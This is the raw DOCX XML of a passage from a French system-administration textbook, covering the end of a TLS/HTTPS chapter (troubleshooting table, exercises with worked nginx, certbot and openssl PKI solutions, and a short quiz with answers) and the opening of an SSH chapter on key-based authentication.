              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>fullchain</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> non utilisé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Navigateur : chaîne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="263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Erreur TLS 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Client ancien</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Journal serveur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2635"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Certificat non approuvé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>PKI interne non déployée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Magasin racine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="263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Handshake lent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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OCSP ou session mal configurée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Mesure répétée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OCSP</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Protocole de vérification de révocation d'un certificat. Le stapling permet au serveur de fournir la preuve lui-même, ce qui évite un aller-retour du client vers l'autorité.</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CONTRÔLES AVANT MISE EN PRODUCTION</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TLS 1.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>1.3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> uniquement.</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fullchain.pem</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> utilisé, pas seulement le certificat feuille.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Redirection HTTP → HTTPS permanente.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Renouvellement automatique testé par </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--dry-run</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w: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Alerte à J-21 sur la date d'expiration.</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TLS garantit confidentialité, intégrité et authentification du serveur.</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confidentialité persistante protège contre la compromission ultérieure d'une clé.</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TLS 1.3 réduit la poignée de main à un aller-retour.</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Un certificat couvre des noms listés dans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>subjectAltName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w: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certificat auto-signé chiffre sans authentifier.</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ACME automatise l'émission et le renouvellement.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DNS-01 est nécessaire pour un certificat wildcard.</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HSTS engage durablement le navigateur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le trafic web est chiffré. Le chapitre suivant traite de l'accès d'administration à distance : SSH.</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58.1 — Diagnostiquer une expiration</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Des utilisateurs signalent une alerte de sécurité depuis ce matin.</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Vérifiez la date d'expiration.</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Identifiez le mécanisme de renouvellement.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Corrigez et prévenez.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 58.2 — Configurer HTTPS complet</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Le site doit rediriger HTTP, servir TLS 1.2+ et envoyer HSTS.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Écrivez les deux blocs serveur.</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Vérifiez la chaîne.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Testez la redirection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 58.3 — Mettre en place une PKI interne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   SÉCURITÉ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trois services internes doivent se faire confiance.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Créez une autorité racine.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Émettez un certificat par service.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Déployez la racine sur les clients.</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58.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>echo | openssl s_client -connect exemple.fr:443 2&gt;/dev/null \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  | openssl x509 -noout -enddate</w:t>
        <w:br/>
        <w:br/>
        <w:t>systemctl list-timers | grep certbot</w:t>
        <w:br/>
        <w:t>journalctl -u certbot --since "7 days ago"</w:t>
        <w:br/>
        <w:br/>
        <w:t>certbot renew --force-renewal</w:t>
        <w:br/>
        <w:t>nginx -t &amp;&amp; systemctl reload nginx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le journal de Certbot indique si le renouvellement a échoué, et pourquoi : port 80 fermé, défi DNS expiré, quota atteint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une alerte à J-21 aurait laissé trois semaines pour réagir : c'est la mesure préventive à mettre en place.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 58.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>server {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    listen 80;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    server_name exemple.fr www.exemple.fr;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return 301 https://exemple.fr$request_uri;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>server {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    listen 443 ssl;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    http2 on;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    server_name exemple.fr;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ssl_certificate     /etc/letsencrypt/live/exemple.fr/fullchain.pem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ssl_certificate_key /etc/letsencrypt/live/exemple.fr/privkey.pem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ssl_protocols TLSv1.2 TLSv1.3;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    add_header Strict-Transport-Security "max-age=300" always;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Commencez par un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>max-age</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> court, puis augmentez après quelques jours d'observation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>fullchain.pem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> contient le certificat et les intermédiaires : sans eux, certains clients ne peuvent pas valider la chaîne.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 58.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t># Autorité racine</w:t>
        <w:br/>
        <w:t>openssl req -x509 -newkey rsa:4096 -days 3650 -nodes \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -keyout racine.key -out racine.crt -subj "/CN=PKI interne"</w:t>
        <w:br/>
        <w:br/>
        <w:t># Certificat de service avec SAN</w:t>
        <w:br/>
        <w:t>openssl req -newkey rsa:2048 -nodes -keyout api.key -out api.csr \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -subj "/CN=api.interne"</w:t>
        <w:br/>
        <w:t>openssl x509 -req -in api.csr -CA racine.crt -CAkey racine.key \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -CAcreateserial -days 365 -out api.crt \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -extfile &lt;(printf "subjectAltName=DNS:api.interne")</w:t>
        <w:br/>
        <w:br/>
        <w:t># Déploiement de la racine</w:t>
        <w:br/>
        <w:t>cp racine.crt /usr/local/share/ca-certificates/pki-interne.crt</w:t>
        <w:br/>
        <w:t>update-ca-certificates</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La clé de la racine doit être conservée hors ligne : sa compromission invalide toute la PKI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le SAN est obligatoire pour les navigateurs modernes ; le CN seul ne suffit plus.</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 garantit TLS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La disponibilité</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La confidentialité, l'intégrité et l'authentification</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La vitesse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La conformité RGPD</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Où figurent les noms couverts par un certificat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Dans le CN uniquement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 xml:space="preserve">Dans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>subjectAltName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Dans la clé privée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Dans le CSR</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Quelle validation ACME permet un certificat wildcard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HTTP-01</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TLS-ALPN-01</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DNS-01</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Aucune</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 fait HSTS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Chiffre le trafic</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 xml:space="preserve">Interdit HTTP au navigateur pendant </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max-age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Renouvelle le certificat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Compresse les en-têtes</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 xml:space="preserve">Pourquoi utiliser </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>fullchain.pem</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Il est plus petit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Il contient les intermédiaires nécessaires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Il n'expire pas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Il est plus rapide</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TLS protège l'échange, pas l'application ni la disponibilité.</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Les navigateurs modernes ignorent le CN et se fondent sur le SAN.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3. C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Seule DNS-01 prouve le contrôle de tout le domaine.</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Le navigateur refuse toute connexion non chiffrée pendant la durée indiquée.</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Sans les intermédiaires, la chaîne de confiance est incomplète.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>59. SSH : accès distant et tunnels</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Administrer des machines sans mot de passe, automatiser des accès et traverser des réseaux fermés.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Intermédiaire · Prérequis : chapitre 58</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Configurer une authentification par clé.</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Utiliser un fichier </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>~/.ssh/config</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> efficace.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Transférer des fichiers et des ports.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Durcir un serveur SSH.</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Diagnostiquer un refus de connexion.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>59.1 Authentification par clé</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une paire de clés remplace un mot de passe : la clé privée reste sur le poste, la clé publique est déposée sur le serveur. Le serveur lance un défi que seul le détenteur de la clé privée peut relever.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre commandes, un accès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Générer une paire Ed25519, recommandée</w:t>
        <w:br/>
        <w:t>ssh-keygen -t ed25519 -C "alice@portable" -f ~/.ssh/id_ed25519</w:t>
        <w:br/>
        <w:br/>
        <w:t># Déposer la clé publique (méthode simple)</w:t>
        <w:br/>
        <w:t>ssh-copy-id -i ~/.ssh/id_ed25519.pub deploy@serveur</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérifier les droits : SSH refuse les clés trop permissives</w:t>
        <w:br/>
        <w:t>chmod 700 ~/.ssh</w:t>
        <w:br/>
        <w:t>chmod 600 ~/.ssh/id_ed25519 ~/.ssh/authorized_keys</w:t>
        <w:br/>
        <w:t>chmod 644 ~/.ssh/id_ed25519.pub</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.208 — Quatre types de clés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3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Type de clé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="286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Longueur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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Recommandation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2732"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ed25519</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2868"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>256 bits</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3414"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Par défaut, rapide et sûre</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="273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RSA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="286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 3072 bits</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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Compatibilité ancienne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2732"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>ECDSA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2868"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
